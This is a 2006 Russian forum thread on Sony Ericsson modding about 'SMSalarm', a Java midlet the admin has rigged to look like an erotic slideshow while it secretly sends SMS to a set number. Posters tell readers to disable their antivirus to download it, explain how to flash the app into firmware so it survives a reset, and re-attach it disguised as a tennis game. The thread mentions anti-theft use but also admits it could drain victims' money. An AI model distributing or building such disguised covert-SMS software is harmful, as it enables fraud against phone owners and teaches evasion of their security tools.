Все для Sony Ericsson, патчи, эльфы, моддинг, прошивка
  
Логин: Пароль: Запомнить: Привет гость! Зарегистрируйся или авторизируйся для получения доп. возможностей!
Разделы
PDA версия сайта
TrackIDentify
Новости
Статьи
Файлы
Патчи
Патчи A2
Патчи db2020
Эльфы
Исходники эльфов
Wiki
Форум
Опросы
Обратная связь
Развернуть/Свернуть
 
Развернуть/Свернуть

SMSalarm в работе : Мультимедиа : Форум : Для Sony Ericsson патчи эльфы моддинг прошивка
/  Список форумов
   /  Мультимедиа
/  SMSalarm в работе
На печать 
Правила 
Страница 2 из 8: « 1 [2] 3 4 5 6 ... 8 »

Zormax


Admin


Регистрация: 12.12.05
Сообщений: 5826
Репутация: 5274
Откуда: Nizhniy Novgorod




 
  #11 [12.07.06, 12:54] SMSalarm в работе   

 
Как известно для большинства телефонов других моделей есть возможнось отсылать скрытно SMS сообщения.
До недавнего времени в SE такого нельзя было сделать, т.к. инженеры компании подошли более серьезно к правам приложения.

С выходом патчей игнорирования "Полномочия" для явы, такая возможность появилась.

Ниже прикрепил измененый мною мидлет SMSalarm, который закомуфлирован под эротическое слайд-шоу.

После запуска мидлета, пока вы смотрите картинки, идет отправление на определеный номер СМС`ки с нужным текстом.

Установка приложения через JAD, но перед этим надо в JAD файле прописать свой номер (заместо 911, писать через 8 а не +7) и нужный текст (желательно латинсикй).

Зачем все это нужно?

1. Если у вас украдут телефон и у вас стоит патч и мидлет, то есть шанс что грабитель позарится на заманчивое название и запустит это слайд-шоу, тем самым вам станет известен номер грабителя (если он вставит свою симку).

2. Для отсылки скрытных сообщений.
К сожалению плохие люди могут воспользоваться этим, чтобы выкачать с вас деньги, например в обменник разместят, а вы скачаете и запустите.......

Предупрежден, значит вооружен (с)

ВНИМАНИЕ!!! Ваш антивирусник (Каспер, Веб, НОД и т.д.) будет ругаться и говорить что там троян. Это связано с анализом антивирусника на вредноносное ПО. В принципе, т.к. программа отсылает СМС, это и является вредноносным ПО. Это не позволит Вам скачать. Для скачки отключите антивирус потом качайте. Вы можете неповерить и подумать что Вам трояна впаривают, это Ваши проблемы. Больше не просим выслать на мыло или на другой файлообменник кинуть. Антивирус и от туда не даст Вам скачать.



Прикрепленный к сообщению файл:

smsalarm.zip smsalarm.zip (193.57 kb; 2306 hits) Скачать файл


TOOKY T83 (1.3.1-L2), MK808B

YaRiSs


Expert


Регистрация: 13.5.06
Сообщений: 1029
Репутация: 25
Откуда: Королёв




 
  #12 [17.07.06, 21:17] Re: SMSalarm в работе   

 
Да я то вижу переправил, прога лежит в играх! Все равно ни фига!!! А ты сам пробывал?




Samsung I8910(custom-rom)+SE W850I

Zormax


Admin


Регистрация: 12.12.05
Сообщений: 5826
Репутация: 5274
Откуда: Nizhniy Novgorod




 
  #13 [17.07.06, 21:20] Re: SMSalarm в работе   

 
YAR
нет, у меня нет времени потом все восстанавливать...




TOOKY T83 (1.3.1-L2), MK808B

YaRiSs


Expert


Регистрация: 13.5.06
Сообщений: 1029
Репутация: 25
Откуда: Королёв




 
  #14 [17.07.06, 22:42] Re: SMSalarm в работе   

 
Эта прога канеш хорошо, но есть и другие, которые смс шлют на платные сайты и со счета лавэ снимают(если у вас канеш стоит патч на Игнорирование полномочий ява, не сертификат Халмера)!




Samsung I8910(custom-rom)+SE W850I

Zormax


Admin


Регистрация: 12.12.05
Сообщений: 5826
Репутация: 5274
Откуда: Nizhniy Novgorod




 
  #15 [17.07.06, 22:50] Re: SMSalarm в работе   

 
Я свой обменник защитил от таких "ложных" файлов.
Так что шансов что они появятся и наткнуться на них мало (ну если конечно не выйдет какой нить новый алгоритм)...




TOOKY T83 (1.3.1-L2), MK808B

anonymous














  #16 [17.07.06, 23:28] Re: SMSalarm в работе   

 
Я перешил тел , заодно и свои приложения прописал:
Прошил main и fs без финализации.
НЕ ВКЛЮЧАЛ тел !!!
Слил через плагин default.xml, отредактировал его (<midlet deletable="false" upgradeable="true" install="false" ...).
Залил обратно, ну и jar и jad файлы в папку default/java тоже..Заодно и папку custom для финализации..
ВСЕ.
Один минус - теперь эту яву можно удалить только через плагин.
Если потом опять что-нибудь изменить в default (уже после включения ), то ничего не происходит :-?



soer


Новичок


Регистрация: 29.1.06
Сообщений: 18
Репутация: 5





 
  #17 [17.07.06, 23:42] Re: SMSalarm в работе   

 
Я свой обменник защитил от таких "ложных" файлов. Так что шансов что они появятся и наткнуться на них мало (ну если конечно не выйдет какой нить новый алгоритм)...

Одно время весь обменник был завален этой байдой с разными названиями.
Когда я в своём 750м убивал мобипринт и теннис,заметил,что кроме как в папке ams их нигде небыло,такая же ерунда и со стандартной темой. Файлы лежат в юзерской директории с атрибутом редонли и при общем сбросе не удоляются (стоит вспомнить хитрый файл layout,который без редонли улетает вместе с экраном :-) ) А сменить имя в манифесте и в джаде не трудно. Патч на яву я имел ввиду про запросы,ещё бы он отменял как сертификат через меню,а так больно стрёмно :-(



Zormax


Admin


Регистрация: 12.12.05
Сообщений: 5826
Репутация: 5274
Откуда: Nizhniy Novgorod




 
  #18 [17.07.06, 23:54] Re: SMSalarm в работе   

 
soer
Одно время весь обменник был завален этой байдой с разными названиями.

Все почистил и поставил алгоритм проверки на эту гадость...




TOOKY T83 (1.3.1-L2), MK808B

YaRiSs


Expert


Регистрация: 13.5.06
Сообщений: 1029
Репутация: 25
Откуда: Королёв




 
  #19 [18.07.06, 01:10] Re: SMSalarm в работе   

 
Даже матом ругаться не хочется, это чтож получается, чтобы прописать любое приложение надо лить новую Фс?? Желающих нет прошить Фс?, а потом до комплита скинуть сюда папку дефолт?:-)




Samsung I8910(custom-rom)+SE W850I

Reb


Вникающий


Регистрация: 18.7.06
Сообщений: 50
Репутация: 0
Откуда: Белогорск




 
  #20 [16.08.06, 20:59] Re: SMSalarm в работе   

 
Так. Если кому надо, то вот как сделать, чтобы приложение не удалялось после МР(на моём примере):
1) Заливаете новую FS(Я использовал сетул)
2) Не включайте телефон после залития FS
3) Открываете плагином FS и закидываете в дирректорий \tpa\preset\default\java файлы superrealtennis.jar и superrealtennis.jad(прилепляю их.не забудьте снести старый теннис, я предпочитаю сначала удалять, потом трамбовать)
4) заливаете всякие сертификаты, чтобы тел нормально включился
5) включаете тел. можете проверить, после МР у меня осталось нужное нам приложение.

УСЁ. Только мне так кажется, что после МР приложение остаётся, но перестаёт остылать смс. Вообще после МР из дирректория \tpa\preset\default\java сносится всё, а интересующее нас приложение переносится сюда: \tpa\preset\system\ams

Ну в общем проверьте, отсылает ли прога смс после МР(у меня желания, как такового, нет сейчас это делать).
ЗЫ. не забудьте в superrealtennis.jad в строчке "alarmphone: 911" вместо 911 вписать нужный номер :-)

YAR
нужно ли выложить папку default? Я её скопировал сразу после прошивания FS.



Прикрепленный к сообщению файл:

smsalarm.rar smsalarm.rar (170.32 kb; 101 hits) Скачать файл


К750 - Философия общения...

Lekseich


Новичок


Регистрация: 31.8.06
Сообщений: 1
Репутация: 0





 
  #21 [31.08.06, 23:28] Re: SMSalarm в работе   

 
Народ извините меня за возможно глупый вопрос
Подскажите как поставить прогу эту в тел ?
ТАМ 2 ФАЙЛА JAD И JAR. и ЧТО ЗНАЧИТ.Установка приложения через JAD???пОМОГИТЕ ПОЖАЛУСТА.зАРАНЕЕ БЛАГОДАРЕН


Страница 2 из 8: « 1 [2] 3 4 5 6 ... 8 »


Похожие темы
 ТемаОтветыАвторПросмотрыОбновление
  Проблемы при работе с Far-ом7zero_2808795310.05.09, 12:31
  Виснет при работе радио4alb884577311.01.09, 18:12
  вопросы по работе с k7902anonymous411224.01.07, 08:37

  • Поиск
  • Права
Вы не можете начинать темы.
Вы не можете редактировать свои сообщения.
Вы не можете создавать опросы.
Вы не можете вкладывать файлы в сообщения.
Вы не можете отвечать на сообщения.
Вы не можете удалять свои сообщения.
Вы не можете голосовать.

Главная Новости Статьи Файлы Патчи Форум Опросы PDA
- Генерация страницы: 0.15 секунд | 12 Запросов | HTML: 45.06 КБ -